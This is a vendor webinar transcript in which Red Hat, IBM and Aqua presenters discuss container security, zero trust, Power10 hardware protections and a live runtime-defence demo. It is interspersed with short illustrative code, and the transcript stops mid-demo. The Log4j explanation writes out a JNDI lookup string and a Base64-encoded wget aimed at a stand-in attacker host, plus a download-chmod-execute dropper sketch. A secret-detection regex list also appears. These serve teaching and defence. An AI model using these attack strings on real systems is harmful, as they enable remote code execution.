Demystifying Security for App Modernization with OpenShift, IBM Power10 and Aqua Security

Security experts from Red Hat, IBM, and Aqua explain how OpenShift, IBM Power10, and Aqua’s cloud native security platform work together to protect modern cloud-native apps. The session includes a live demo of runtime security in action, showing how Aqua blocks attacks in real time through immutability, drift prevention, and policy enforcement across build, ship, and run.
Duration 1:03:04
Presented By:
Bill Gagliard
Partner Alliance Manager, Red Hat
Dimitrios Pendarakis
Distinguished Engineer & CISO, IBM Power
Philip TM Pearson
Field CTO, Aqua
“There is no reason why anybody needs to get access to a running container. In a modern setup the container is immutable. If you need change, you rebuild through the declarative pipeline with policy checks, not a shell into production. Remove exec access and you close a major door.”
Phil TM Pearson
Field CTO, Aqua
Transcript
Hi Everyone. I'm Janine Donnelly, manager of webinars for Tech Channel, and I'd like to welcome you to our presentation, Red Hat, Aqua Security, and IBM Power: Demystifying Security for App Modernization.
We're delighted to have a distinguished panel of experts to share their insights with you today. Bill Gagliard has been in the high-tech industry for the past twenty seven years.
Before joining Red Hat, he worked at Amazon Web Services, Microsoft, and AT&T managing global enterprise customers.
At Red Hat, Bill works in the ISV organization and uses modern delivery methods to support a hybrid cloud strategy to help partners build and run applications on any cloud.
Dimitrios Pendarakis is an IBM distinguished engineer and the chief security officer for IBM Power.
In this role, he helps formulate and execute the security strategy and roadmap of IBM Power at the hardware, firmware, OS, and system management levels for both on prem and cloud offerings.
Phil Pearson is the principal security architect and zero trust subject matter expert at Aqua Security.
He's an experienced engineer and security professional with years of experience in building cloud technologies and tackling transformational challenges.
And so without further ado, Bill, I'll turn the presentation over to you.
Okay. Thank you, Janine. Well, good morning, good afternoon, and good evening. I know we have a worldwide audience on the bridge, and I appreciate you joining from wherever you are.
So let me take you through our agenda and what we're going to cover over the next hour.
As Janine said, I am from Red Hat, and I'll be teeing up the webinar. I'll be talking about modernizing hybrid cloud with OpenShift and why you should secure OpenShift for containers and Kubernetes with Aqua Security. IBM will be talking about security best practices, virtual machine and container security, and then securing modernization and your journey with IBM Power.
And then towards the end, Aqua will be speaking about a framework for container security to support modern applications and then diving more into zero trust security principles.
So today is all about OpenShift, and OpenShift is our platform for containers and Kubernetes. We will talk about how we integrate with IBM Power, how Aqua provides a security platform for this service that is unmatched in the industry.
We see the adoption of OpenShift taking off; there's exponential growth that we've seen over the past three to five years with the platform. What it is doing is empowering developers to innovate, providing a cloud-like experience everywhere, and giving customers a trusted enterprise environment for containers and Kubernetes. The beauty of this is it can run anywhere. It can run in the data center. It can run in a hybrid environment or in your public cloud, and it provides a lot of options and ability for customers and businesses to move mission critical workloads and applications to the cloud and the environment that you've chosen. OpenShift is also available as a managed service platform. We've had customers ask us for more options in deploying OpenShift into the cloud of their choice.
So since last year, and there have been more announcements this year, we have introduced OpenShift as a managed service in AWS, Azure, IBM Cloud, and Google. We've also done this with our other platform, which is Ansible for automation. So we see more and more customers adopting the public cloud and having that be a critical part of their IT transformation, and they want options to use OpenShift in that environment. So we see a high rate of adoption for this with customers that want that choice. And if they choose not to take on running a Kubernetes environment in their data center, and they wanna run it as a managed service in their preferred cloud, that is available as well.
We have a much better together story around working with Aqua and securing the environment. This environment is not gonna be as strong or provide as much benefit to customers if it's not secured. So as we go through the webinar, you'll see and you'll understand how Aqua is providing a level of security to the OpenShift platform that is like no other, making customers in any environment feel safe and secure when they deploy workloads to OpenShift.
And lastly, before I turn it over to IBM, we look at security from kind of three levels.
We secure the build, we secure the infrastructure, and we secure the workload wherever it runs. And as we go through this and and you hear from IBM and you hear from Aqua, you'll understand deeper how we go into these three categories and wrap OpenShift in a very secure way. So with that, I will turn it over to Dimitrios to take us through cloud native.
Thank you very much, and thanks everybody for joining us here for this webinar. I wanna start by motivating a little bit, you know, why we need a container security solution, like the one provided by Aqua, and what are some of the benefits and challenges in the security space that containers provide. So let's start with an overview of what a cloud native application is. We hear this term a lot these days. These are applications, as you see here, that are made to run on the cloud, on a variety of different cloud instantiations: private, public, hybrid.
Applications are abstracted from the infrastructure. So as a developer, you don't need to be concerned about what type of infrastructure it will run on, what the characteristics of the underlying platform are, and so on.
Cloud native is typically based on microservices and containers, although some of these cloud native principles are infused across all types of development these days. And then applications are orchestrated for operational management, easy scaling, resiliency, and easy updatability.
So these principles are kind of highlighted in this next page, where we look at some of the comparisons and contrasts between development of cloud native applications in containers and how this compares to virtual machine environments, which is kinda like shown here as traditional environments. So across all of these categories, you see the differences. So in cloud native, if we start from the top, you have this so called shift left, where instead of having infrequent releases, you have a continuous cycle where you have automated development, testing, and deployment, and this allows you to handle vulnerabilities much faster.
So as CVEs and vulnerabilities are published, you can integrate the remediation of these with your development life cycle, and you don't have to worry about patching, bringing down applications and so on. Another aspect which is tied to the first one is the fact that traditional environments tend to be very persistent, as opposed to ephemeral, again, that's the idea that can delete and deploy new containers without impacting your application, and by doing this continuously, again, you stay ahead of the threats.
Another aspect here is that in terms of isolation, having strong fences between different applications and containers, in the case of cloud native and container based workloads, relies on a shared kernel, which essentially abstracts, gives the illusion of having a dedicated OS to containers, as opposed to relying on hypervisor or hardware isolation in traditional environments, but we should keep in mind that when we talk about security properties and isolation in particular, the infrastructure continues to matter, so you have to have strong isolation across the stack and enforcement of least privilege in the workloads.
And finally, some other points here. With containers, you tend to use open source code very heavily, which again tends to be better from a security point of view, because it's code that has been exposed to large communities of people who have the ability to review and vet it, if you want.
Finally, in terms of software supply chain, which is an item that has attracted a lot of attention recently, there are concerns, and in the case of traditional environments, you rely mostly on proprietary software that is very hard to check.
And in the cloud native case, again, there's commonly reuse of public images, libraries and so on that allow better traceability and better provenance of the different components, and these feeds into better management of supply chain risks.
So let's talk a little bit about how the tasks that one has to do compare. So we talked about some of the development characteristics. Now when you operate an application that is based on VMs versus containers in cloud native security, you see here that in all cases, you have to do some of the common tasks that are associated with security operations, right? So you have to worry about patching, application hardening, compliance checking.
You have to handle privileged user monitoring and audits, right? And then you also have to look at some of the application security considerations, like how do I secure my stack in the VM case from the VM through the application layer? I have to make sure that my networking and my storage are configured correctly. I have to make sure that my virtual machine image is secure, has been scanned for vulnerabilities, and so on.
And then once the application is instantiated, I have to consider how do I ensure that I have the best runtime security, right? So if we look on the right, so consider here you're migrating from a VM based application, or workload to a cloud native one, and you see here that you still have to do the tasks or at least some of the tasks associated with managing the OS. So you see here the blue, the deep blue color signifies things that you have to take care of at the OS security.
But a lot of these tasks now benefit from the shift left, and the operational tasks here that you see on the bottom, when it comes to things like hardening and so on, are reduced. Let's take an example, right? Vulnerability management: now you have to do less of that, because your VMs only have, let's say, kernel components; they don't have applications and libraries. And with containers, as we discussed, you just rebuild rather than patch. So your overall load in terms of performing vulnerability management is decreased, and it gets more automated now as part of the DevOps pipeline. Similarly, tasks like auditing and monitoring privileged users are reduced, because now there's much less need for an administrator to log on to a host operating system, a worker node as we call it, because there's no need to configure applications, you know, libraries, networking, and so on.
This is all done at the application level, at the light green box that you see at the top. So some of your traditional VM management tasks are simplified and reduced in intensity, but to realize that benefit, you now have to do some of the tasks on the top, the green colors here, that have to do with things like container image security, registry, orchestrator, and so on. And we'll talk about some of this in the next slide.
And finally, we still wanna emphasize that although infrastructure is abstracted, a strong infrastructure with strong platform security is still essential and makes a big difference in terms of anchoring this whole application and cloud native platform on good integrity and isolation. So let's talk a little bit about some of the challenges, why we need a container security solution. And as you see here, this is a typical life cycle of container development, and the elements that you have here across build, ship, and run all introduce additional security considerations.
Again, as you build the image and you test, you make sure that they don't have vulnerabilities or rogue elements and so on. As you manage registries, you have to make sure that they have the right access control and the right container images in them and so on.
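That build-stage check can be pictured as a simple policy gate: the image is only promoted to the registry if its scan results clear a severity threshold. The sketch below is a generic illustration; the severity names and data shape are made up for this example and are not Aqua's or OpenShift's actual API.

```python
# A toy policy gate for the build stage: the image is only promoted to the
# registry if every scanner finding is at or below a severity threshold.
# Severity names and the findings format are illustrative, not a real API.
SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "critical": 4}

def may_promote(findings: list[dict], max_allowed: str = "medium") -> bool:
    """Return True if the built image may be pushed to the registry."""
    limit = SEVERITY_RANK[max_allowed]
    return all(SEVERITY_RANK[f["severity"]] <= limit for f in findings)

if __name__ == "__main__":
    clean = [{"id": "CVE-2021-0001", "severity": "low"}]
    risky = [{"id": "CVE-2021-44228", "severity": "critical"}]
    print(may_promote(clean))  # True
    print(may_promote(risky))  # False
```

In a real pipeline this decision would run as a CI step after the scanner, failing the build rather than returning a boolean.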
So as you see here, OpenShift provides essentially the bedrock for orchestration security, but this must be complemented by a container native security platform to provide security across the full lifecycle. And some of the targets of this container native security are shown here, which kind of breaks it across the categories that we were seeing in the previous slide. So you have security considerations for the images, right? So are there configuration defects? Has somebody configured, let's say, network security in a wrong way or credentials in a wrong way? Are there any embedded components that might be malicious, right? So this is kind of like the more traditional malware detection, antivirus if you want, making sure that you don't have anything malicious.
Sometimes developers make mistakes like putting clear text secrets in the images and you want to be able to detect and prevent that.
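A toy version of that secret-detection check might look like the following. The regex patterns here are purely illustrative; a real scanner uses far richer rulesets and also inspects image layers, environment variables, and build history.

```python
import re

# Patterns that commonly indicate clear-text secrets left in an image.
# These are illustrative examples only, not an exhaustive ruleset.
SECRET_PATTERNS = [
    re.compile(r"AKIA[0-9A-Z]{16}"),  # shape of an AWS access key ID
    re.compile(r"-----BEGIN (RSA |EC )?PRIVATE KEY-----"),
    re.compile(r"(?i)(password|api[_-]?key|token)\s*[:=]\s*\S+"),
]

def scan_for_secrets(text: str) -> list[str]:
    """Return snippets in a file's contents that look like secrets."""
    hits = []
    for pattern in SECRET_PATTERNS:
        hits.extend(m.group(0) for m in pattern.finditer(text))
    return hits

if __name__ == "__main__":
    leaked = 'db_password = "hunter2"\nAKIAABCDEFGHIJKLMNOP'
    print(scan_for_secrets(leaked))
```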
Similarly, you see here in the registry components, you have secure images, but the images go on the registry. This registry has to be secure in terms of how it gets accessed. It has to authenticate and authorize users in terms of what images they can upload or, retrieve. And of course, you have to manage freshness, right? So once images are old, deprecated, they have vulnerable libraries and so on, they have to be removed. And then when we go to orchestration, you have similar concerns, right? So who can get privileges to perform administrative actions to orchestrate, to deploy, and that includes concerns around how are containers networked and how they are allowed to communicate with each other, what type of network security settings are employed.
And you see here in the last two categories getting into containers themselves, some of the similar concerns that we had previously, runtime software vulnerabilities that are typically, as I mentioned, not patched, but are remediated by deploying new containers.
And then at the end, you see still infrastructure considerations, right? So we talked about the fact that you're shifting a lot of your operations in the container space with DevSecOps, but you still have to ensure that your host OS, your worker nodes do not contain vulnerabilities, you're protecting the file systems, and so on.
Sorry, it looks like there was some jump on the slides here, apologies for that. Let me go back here. Okay. So with that, I wanna talk a little bit about, Bill mentioned, the best combination of security between Red Hat, IBM Power and Aqua. So I wanna give some examples of why we think Power and the Power ten processor and systems are the best platform to deploy cloud native workloads. And this is an example when we built the Power ten processor.
People may remember a few years back, we had a lot of excitement and, of course, concern in the industry about microarchitectural attacks. These are kind of like your side channel attacks, Spectre and Meltdown for those who remember these buzzwords. And, of course, the whole industry was very concerned about all of these attacks that were coming out in the literature and also demonstrated in practice. We had the benefit of going through the design of the Power ten processor at the time, and we took a painstaking view of all these possible side channels that were published and theorized and demonstrated to make sure that the processor is architected in such a way that it protects from all of these classes of speculative execution side channel attacks. And these protections are built on the hardware, on the core.
They do not require any patches in firmware or the operating system and so on, which is what is shown on the left that as the industry was responding to these, often there were mitigations that took a very heavy toll and had a very heavy overhead. So Power ten basically allows you to mitigate across all of these attacks with very, very little overhead.
Another example here, again focusing on the infrastructure, is another set of vulnerabilities, also kind of like capturing a lot of interest in the industry a few years back that had to do with vulnerabilities in service processors, what is often referred to as BMC, which allow servers to be managed remotely. So these are vulnerabilities that apply to a system that is separate from the main CPU system. So you can think of you have your CPU, you have your service management network, and if somebody can come through vulnerabilities in the service management system, subsystem, then they could potentially get access to sensitive data and customer workloads that are being processed by the CPU. So what power systems did was to treat the CPU and the service processor as a different trust domain, and this can be viewed visually as kind of like a firewall here, where the service processor only gets access to the absolutely necessary resources that it needs to perform its tasks.
This is what we call a combination of allow list and block list, which is implemented again in the hardware, in the processor itself, shown here visually as a firewall.
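The allow list/block list idea can be pictured with a small default-deny sketch. The resource names below are invented for illustration; the real mechanism is implemented in the Power10 hardware itself, not in software.

```python
# A toy model of the allow-list/block-list "firewall" between the service
# processor (BMC) and CPU resources: the BMC may touch only the resources
# it strictly needs, and everything else is denied by default.
# Resource names are illustrative, not real Power10 identifiers.
ALLOWED = {"thermal_sensors", "fan_control", "power_rails"}
BLOCKED = {"main_memory", "customer_workload_state"}

def bmc_may_access(resource: str) -> bool:
    """Default-deny access check for the service processor."""
    if resource in BLOCKED:
        return False
    return resource in ALLOWED  # anything not explicitly allowed is refused
```

The key design point is the last line: unknown resources fall through to a deny, so forgetting to classify something fails safe.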
But then in addition to that, our newer Power ten systems, the mid range and scale out, have additional functionalities to protect the integrity of the complex and make sure that there's things like secure boot to verify the integrity of the image that is running on the processor. And by image here, I mean firmware image, not container image, apologies for the terminology overload. So the bottom line here is that these capabilities strengthen the security of your service processors, but they also effectively build, if you want, on the concept of zero trust: these two systems do not have to trust each other, and even if somebody is able to breach into the BMC subsystem, the damage that can then be done on the CPU is limited, right?
So that's the benefit. And let me move to an additional point where infrastructure matters, and that has to do with encryption, right? So often the workloads will require encryption, which is, of course, one of the best ways to protect data, assuming that you know where to do it, how to do it, and what algorithms to use, what key management systems to use.
So Power ten makes another set of breakthroughs, I would say, in terms of encryption. So first of all, when we talk about encryption, the pyramid on the left tries to explain what layers encryption happens in.
From the bottom, which is kinda like encrypting data at a very coarse granularity, so things like encrypting data in the storage system, or encrypting data in memory, which happens in Power ten. So all data in the CPU memory is encrypted in Power ten. This is done without any additional setup or management, you don't have to configure it or turn it on, it's always on, and it pretty much has no performance impact, right? On top of that, there's different layers where one may want to apply encryption at the level of the virtual disk, or at the level of the file system, or at the level of applications themselves, right?
For all of these cases, Power ten provides very fast encryption with four times the number of crypto engines in every core compared to Power9, and so this accelerates things like AES, which is the most common symmetric encryption algorithm, by a factor of two point five times, and we also have support for quantum safe cryptography and fully homomorphic encryption to be able to do this at very high speed. I'll try to wrap up here with some points about how security requires a holistic approach. It's not just a set of features, of which I tried to cover a sample, but it relies on building secure systems securely through principles of secure engineering, as noted here.
There's features, individual features that are talked about around firmware integrity, encryption, acceleration of encryption, and so on.
This whole question, how do we simplify security operations?
Again, the things that we touched on in the beginning around vulnerability management and compliance verification, and here's where Aqua will come next, where it makes container security much stronger and easier to do across the build, deploy, run profile.
And then finally, as a platform, we strive to achieve certifications that prove our adherence to these principles, including Zero Trust security.
I'll flash a slide here about quantification, to some extent, of our strength in terms of having orders of magnitude fewer vulnerabilities in our infrastructure, our hypervisor, PowerVM, compared to some other hypervisors in the industry. But I'll put a disclaimer here: this is kind of like a result of our rigorous testing, smaller code base, secure engineering processes, and so on, but it should not be interpreted as a way to quantify security benefit. It's just an indication, you know, we take pride in this, but it's not a direct quantification of security benefit. And with that, I will reiterate the point here that the combination of IBM Power, with what we think is the most secure hardware, with Red Hat, the leader in hybrid cloud, and Aqua, the leader in cloud native security, is the best of all three worlds.
And our partnership with Aqua is based on the recognition of the importance of container security, and basically this is your best of breed solution for container and cloud native workloads. So, I'll hand over to Philip here. Thanks, everybody, for being with us.
Okay. So thank you, Dimitrios. Okay. I will try not to break the presentation because I'm going to share my screen. Bear with me.
Janine, can you confirm when you can see my screen, please?
And looks like we're good to go, Phil.
Okay. Well, welcome, everybody, and thank you IBM and Red Hat for giving us this opportunity and for the kind words. And welcome to the audience. So first things first then, yes, we're going to look at a cloud native approach to zero trust, but we're gonna do this in a really interesting way.
We're gonna do a small demonstration, where we're gonna look at a few controls. Actually, we're gonna defend against a live attack in production, which is really interesting. And I've provided us with an Internet facing web server, which is gonna enable me to be able to do that, which is based on an OpenShift cluster on the IBM Garage. So we've got all of the components in place.
I'm gonna take you through a few slides, but most important from this slide here is that Aqua's understanding of zero trust aligns with NIST SP 800-207.
Okay. So a quick agenda then for this part of the webinar. We're gonna focus today on the zero trust model, and it will all become clear as we go through the presentation.
And we're gonna do that by looking at the cloud native attack kill chain, and then we're gonna take that kill chain and superimpose it on a real world kill chain, and you'll see how those things line up. And then we're gonna defend against that kill chain in the live demonstration.
And finally, we're gonna wrap up by looking at some of the core operating principles and capabilities of both Aqua and container security in general. And then we're gonna look at a framework for zero trust. In other words, all the capabilities that you're going to need as you move on your journey into the cloud utilizing OpenShift and then, hopefully, Aqua Security as your cloud native security solution of choice.
Okay. So within the zero trust model there are five domains. And the one that we're gonna focus on today is application workloads. And in fact, Aqua does cover some of these other areas as well.
But for the purpose of this presentation today, we are going to focus on the application workload. Okay. As we move forward into our journey into the cloud, then we have to think about how we could be potentially attacked in the cloud.
And so what we've done here is we've put together a cloud native kill chain to demonstrate that almost every single attack is done using one or many of these patterns that we're gonna look at today.
So first things first, the bad guys, or the attacker, need some kind of access. Now one of the first principles that we're gonna talk about today, which differs potentially from how you might think about security, is that from a zero trust perspective, we're now saying "assume breach."
And what we mean by that is that previously, we always architected our environment to think about the future. Right? At some point in the future, we know that we are going to be attacked. Potentially, we are going to be breached. In the zero trust environment, we're saying we've already been breached.
The bad guys are already through the door, and now how do we architect and defend against the live attack in production assuming that it's already happening?
Okay. So that's a strange way of thinking because that means, okay. So people are already there. Now you think about the cloud and think about, the way that people get access to these environments.
You're in a shared environment. Right? So you're in a shared instance. What separates you from another client is a hypervisor, and we have to have some kind of segregation. There has to be the ability to remove the capabilities for people to be able to traverse from one account to another account, and all of that is handled, in a cloud shared model, mostly by the cloud service provider.
From your perspective, what you need to be able to defend against is the internal threat and the external threat. And if you look at the FBI cyber security statistics on the investigations that they're called in to investigate, more than eighty eight percent of those investigations are resolved as the attack came from the inside.
Okay? And a lot of those are gonna be misconfigurations. Many of them are gonna be people on the inside passing on credentials to somebody on the outside, or some of them could be some kind of, you know, email that's gone out there and somebody has clicked on a link to change their password and give somebody access. But, actually, hacking from the outside, the nation state attack, is quite rare. However, obviously people do that, that does happen, and we have to be able to defend against all of them.
Okay. So the first thing when we look at the attack kill chain, the first layer that we need to be able to protect is access.
Okay. So how do we do that? How do we do that in the live workload here? So I'm not necessarily talking about identity here.
I'm talking about how somebody gains access to a running container.
Now in the cloud, one of the first architectural principles that you need to architect towards is immutability.
And immutability, if you think about immutability, it's the opposite of mutation. Right? Mutation is change. In the cloud, we don't change.
Okay? So containers are inherently immutable. It's people who change that. So if a container is immutable, it means that nothing changes in the live environment. And exactly as Dimitrios said, when we're talking about build, deploy, and run, in that environment we have to ensure that, from the moment that we build that container, the container doesn't change thereafter.
And if we need to make a change or create change or enact change to that live workload, then we do that by the declarative pipeline, which is subject to peer reviews, scrutiny, and policy checks. Okay? And this is the bulk of the work that Aqua will do for you. Now once somebody has got access, remember this is zero trust now.
This is how we're thinking in this in in this modern world. If somebody's already got access, then what's the next layer? Because, you know, they already have access to your system. I mean, internal people need access.
Right?
If you forward fix, meaning that you don't go through a declarative pipeline, then you have to give somebody with, normally, engineer level capabilities access to your live environment, probably through some kind of bastion server or a jump box. They're going to need privileges. They're going to need authorization, and they're going to need the capabilities to create that change, to patch that server or that code in the live environment.
So to give them access means that you've lost all trust.
So, again, the architecture principle that we wanna talk about mostly today in zero trust is immutability. So first things first, let's remove all access to a running container. There is no reason why anybody needs to get access to a running container. So the first thing that we're gonna look at later is how do we remove that access. The second thing then is once the attackers have got access, remember, we're assuming breach, then they need to get the payload onto the system. They have to get the malicious software there somehow.
And once it's there, they have to run it.
Okay? So they have to execute the binary. So just to reiterate then, somebody's gonna get access. Once they get the access, they then have to get the payloads onto system.
And once they've got the payload onto the system, they have to execute it.
So the three elements that we're gonna focus on today when we're defending against the live attack in production, which we're going to do a little bit later on: we need to be able to terminate the command that gives them access. Then we're gonna deny the payload, and then the final layer is we're gonna block the execution.
Okay? And at every level, we're gonna demonstrate if these controls are not in place, what could happen.
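Those three controls — terminate the access, deny the payload, block the execution — can be modeled as a minimal policy object. This is a conceptual sketch only, not Aqua's implementation; the class and method names are invented for illustration.

```python
from dataclasses import dataclass, field

# A toy model of the three runtime controls: terminate exec access into a
# running container, deny files that drift from the built image, and block
# execution of binaries that were not shipped in the image.
@dataclass
class RuntimePolicy:
    allow_exec: bool = False                       # no shells into running containers
    image_files: set = field(default_factory=set)  # files shipped in the image

    def on_exec_request(self, user: str) -> str:
        return "ALLOW" if self.allow_exec else f"TERMINATE: exec by {user} denied"

    def on_file_write(self, path: str) -> str:
        # Drift prevention: the container is immutable after build.
        return f"DENY: {path} is not part of the built image"

    def on_process_start(self, binary: str) -> str:
        if binary in self.image_files:
            return "ALLOW"
        return f"BLOCK: {binary} was not shipped in the image"
```

The point of the sketch is the ordering of the layers: even if the exec check is bypassed, the payload write is denied, and even if a payload lands, its execution is blocked.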
Now in order to do that, let's have a look at a real world live attack chain here. One of the most prominent ones last year was Log4j. In fact, it was almost exactly this time last year, and we'll have a look at Log4j in a few minutes in my code.
Let's just describe the screen, and then we're gonna move into the demo. So first things first, if we look on the right hand side, we've got a malicious Java class. In this case, that's the payload. That Java class is a file.
We have to get that file onto our server and then run it. To do that in this particular case, the attacker... in fact, if I'm right, this was first seen through Minecraft. Yeah. That's right.
So in Minecraft, the servers that controlled the chat had Log4j implemented as a package within that Java app, and the chat inputs were just free text entry fields.
And the code in this particular case was a Base64-encoded command, and that command pointed to the LDAP server, which was the command and control server that was managed by the bad guys in the cloud. Okay. So first things first, once the application logged that input, and we'll look at that in a second, the Log4j program read through that script, that Base64 command, which reached out to that LDAP server using JNDI and downloaded that malicious Java class on the right hand side. And on the right there, you can see, using wget and curl, it downloaded that. So with typical malicious capabilities, it downloaded that file and executed it as part of its activity there. As you can see, they used chmod so it was able to run, and it was that that gave the remote access to that server.
So once you run that malicious Java class, the bad guys gain remote command execution. Okay? So it's all about getting the payload onto that server: reaching out to the server, downloading, executing. And once it was executed, that gave the bad guys the ability to gain access to that server and take those companies apart.
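The generic pattern Phil describes, download, mark executable, run, can be sketched in a few lines of shell. This is a safe illustration: the URL in the comment is hypothetical, and the "download" is faked by writing a local file instead of fetching anything.

```shell
# Sketch of the generic dropper pattern described above (download, chmod,
# execute). In a real attack the first step would be something like:
#   wget http://attacker.example.com/payload.sh   (hostname hypothetical)
# Here we fake the download with a local file so the sketch is safe to run.
workdir=$(mktemp -d)
cd "$workdir"

printf '#!/bin/sh\necho payload-executed\n' > payload.sh

chmod +x payload.sh    # the chmod step seen in the captured attacks
./payload.sh           # execution is what hands the attacker remote control
```

Every control shown later in the demo targets one of these three steps: prevent the access, prevent the download, or prevent the execution.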
And the reason we know this is because our own Aqua research team, Nautilus, put honeypots out there as soon as this attack happened, exposed to Log4j, and observed thousands of these attacks. We just watched everything the attackers did. And as a consequence of that, we were able to build the technology that would defend against them.
So real quick then, let's just have a look at, a real world example in my code.
So, Janine, are you looking at my code now? Let me just confirm that switch. Okay.
Yes, Bill. It looks good.
Perfect. Okay. So what you can see here, I've got my little application here. So I'm just gonna run this application.
And as I run this application, what you can see on the right hand side there is Log4j. Right? Log4j is a third party package which I've implemented, which will tell me everything I need to know about what's happening when I boot up this application. There are six levels that Log4j actually logs: errors, warnings, information, debug, trace, and fatal errors. Okay. And in this particular case, if you click on this link here, which I won't do because it will take me to another screen, which I can't share, that will take me to my command and control server, which enables me then to download that payload.
So Log4j as a tool, all that it does is it logs out all of that information based on those six levels: errors, fatal, etcetera. But in the case of the bad code that was used here, it actually reached out to that LDAP server in the cloud and downloaded that malicious Java class, which gave remote command execution.
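The attacker input Phil refers to looked roughly like the JNDI lookup string below. The hostname is hypothetical, and the Base64 wrapping is shown as a round trip so the sketch is self-checking rather than shipping a pre-encoded blob.

```shell
# Roughly the kind of string attackers typed into a logged input field
# (hostname is hypothetical; vulnerable Log4j versions resolved the lookup):
lookup='${jndi:ldap://attacker.example.com/Exploit}'
echo "chat message: $lookup"

# Variants wrapped the follow-on command in Base64, decoded server-side:
cmd='wget http://attacker.example.com/mal.sh'
enc=$(printf '%s' "$cmd" | base64)
echo "encoded: $enc"
printf '%s' "$enc" | base64 -d   # decodes back to the wget command
echo
```

The point is that the log entry itself carried the instruction: the logger did the attacker's work for them.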
So okay. So let's go into the demo. I'm not gonna go through Aqua in too much detail, but I am going to look at the runtime policies, which are gonna help us defend against this and put into place those three layers that we've been talking about in the presentation so far. But real quick, let's have a look at the setup.
So what we've got here, as you can see on the screen on the bottom left, is a test namespace within my OpenShift cluster, and running in it, a cloud facing web server.
Okay? So at the moment, that's open to attack. We're going to put in just a few controls that would prevent those attacks from being realized.
Okay? And just for everybody's information, as you can see here, everything is in OpenShift. I'm gonna switch over to OpenShift now before we come back to Aqua to have a look at the account. So just bear with me a second while I log in.
Okay.
Let me just get my password.
Okay. So, Janine, can we see OpenShift?
We sure can.
Okay. So what I've done is, last night at about twenty two thirty seven, I installed Aqua into my OpenShift cluster. And if we look at the Aqua security operator, what you can see are all these APIs here. But the most important ones are the enforcers.
I mean, they're all important. You need all of them, but the enforcers are the runtime piece. The enforcers allow us, using the API, to defend and place controls on our live containers, switching different controls on and off, and I'll bring that to life when we go back into Aqua in a few minutes. Okay.
So, basically, what I've done here is I've deployed these enforcers into the test namespace of my OpenShift cluster, and these enforcers will now allow me to enact certain controls that meet my standards and policies and enable me to answer three core questions.
The first question that we need to think about is: can we identify vulnerabilities? Okay. We've got an enforcer that will help us do that. The second question is: can we capture misconfigurations?
Bear in mind that more than eighty eight percent of all issues are caused by misconfigurations.
And then the final thing is: can I defend against a live attack in production? And that's exactly what we're going to do next. So if I go down to my workloads, into the pods, you can see here I've got my NGINX server.
So the NGINX server has been deployed into that OpenShift cluster. If I go over to the terminal, and let's have a look.
Okay. And as you can see here, I've got root access to a running container. So this is bad.
If I've got root access to a running container, it means I can do anything to this container. So if this container has got my core website, and that website's linking out to other applications such as your online banking, for example, then this is my route in. Right? So this is my web server.
This is my front door, and I've got root access to it. So that would be bad. As an engineer, you would definitely not want to give me this. So we have to have the ability to remove this access.
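A quick way to see the problem from inside any container shell is to check the effective user ID; this is a minimal sketch, and the printed messages are just illustrative:

```shell
# Quick sanity check inside a container shell: are we root?
# uid 0 means full control over the container's filesystem and processes.
uid=$(id -u)
if [ "$uid" -eq 0 ]; then
  echo "container is running as root (uid 0)"
else
  echo "container is running as uid $uid"
fi
```

`whoami` gives the same answer by name, as shown later in the demo; `id -u` is handy in scripts because it returns a number you can test against.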
Now remember that this could happen as a misconfiguration. What I can absolutely guarantee is that when I do health assessments, in almost every case, when I look at things like Docker containers, I can see that Docker containers by default are delivered running as root, and customers do not adjust that.
In many cases, I go to some customers and they've got fifty thousand, a hundred thousand containers deployed as root.
Okay. So we need to be able to provide a guardrail that would prevent that. The way that you would do that in Aqua is that you would have a policy enforcement point within your declarative pipeline, and as you build your container, you scan it for vulnerabilities. That's the first thing you're going to do. Aqua has got that enforcer in there, and what it will do is check the image in your container against the CVE database.
Okay? And if it identifies any vulnerabilities, potentially, you could block the build at that point. That's up to you. Normally, on high and critical vulnerabilities, that's exactly what you would do.
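In a CI pipeline, that gate usually comes down to an exit code check. Here is a minimal sketch of the pattern; `scan_image` is a stand-in function, not Aqua's CLI, though a real invocation could be something like Trivy (Aqua's open source scanner) with `trivy image --severity CRITICAL --exit-code 1 myapp:latest`.

```shell
# Hypothetical pipeline gate: the scanner exits non-zero when it finds
# critical CVEs, and that failure blocks the build stage.
scan_image() {
  # stand-in: pretend the scan found a critical vulnerability
  return 1
}

if scan_image "myapp:latest"; then
  echo "scan clean: image may proceed through the pipeline"
else
  echo "build blocked: critical vulnerabilities found"
  # in a real pipeline you would exit non-zero here to fail the stage
fi
```

The decision of which severities block the build is policy, exactly as Phil says: normally high and critical block, lower severities get logged.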
But let's assume now that you allow that through, or that it doesn't find any vulnerabilities. The next thing that you're gonna want are what we call assurance policies. An assurance policy would, for example, check to see if the container was built to run as root. That would be one.
Another one might be that you would check that your engineer has defined a CPU limit in its Kubernetes pod.
Because if you haven't put a ceiling on the CPU, then you open yourself up to a denial of service.
So you would definitely want to do that.
Okay? So the idea in the cloud, and one of the core benefits of the cloud, is that we deploy exactly what we need when we need it. If we need more, we scale out. If we need less, we scale back.
So you want the ability to scale, but you have to put the ceiling on that. That's best practice. In fact, that's regulated. You have to have limits.
So those limits should be defined in the configuration. If they're not, that would be considered a misconfiguration. And at that point, you've got a policy enforcement point within Aqua that would block that build that's targeted for production from going any further in the pipeline. This is one of the core benefits of the declarative pipeline.
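Those two checks, no root and a resource ceiling, live in the pod spec itself. Here is a minimal sketch of the fields such a misconfiguration check looks for; the names and values are hypothetical, not from the demo cluster.

```shell
# Minimal pod spec showing the fields the misconfiguration checks look for
# (names and values hypothetical):
cat > pod.yaml <<'EOF'
apiVersion: v1
kind: Pod
metadata:
  name: web
spec:
  containers:
    - name: nginx
      image: nginx:1.25
      securityContext:
        runAsNonRoot: true      # refuse to start this container as root
      resources:
        requests:
          cpu: 250m
          memory: 128Mi
        limits:
          cpu: "1"              # the CPU ceiling discussed above
          memory: 512Mi
EOF

grep -q 'limits:' pod.yaml && echo "limits are defined"
```

If `resources.limits` or `runAsNonRoot` is missing, that is exactly the kind of misconfiguration a pipeline policy enforcement point can catch before the build reaches production.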
Okay. Back to the demo then. So if we just clear the screen.
Okay. Back in the terminal, as you can see here, I've got full access as root. So what to do about that? So the first thing, if we go back to Aqua. The first thing that we talked about in the attack kill chain is: how do we prevent access? What you can see here on this screen is that we've got an enforcement mode.
Okay? So we can either just audit, which is obviously just information, or we can enforce, which now means that we're gonna block activities or behaviors that we don't consider appropriate.
Okay? And there are a lot of controls here that you can use. And one of them, right at the very top here, is to block container exec.
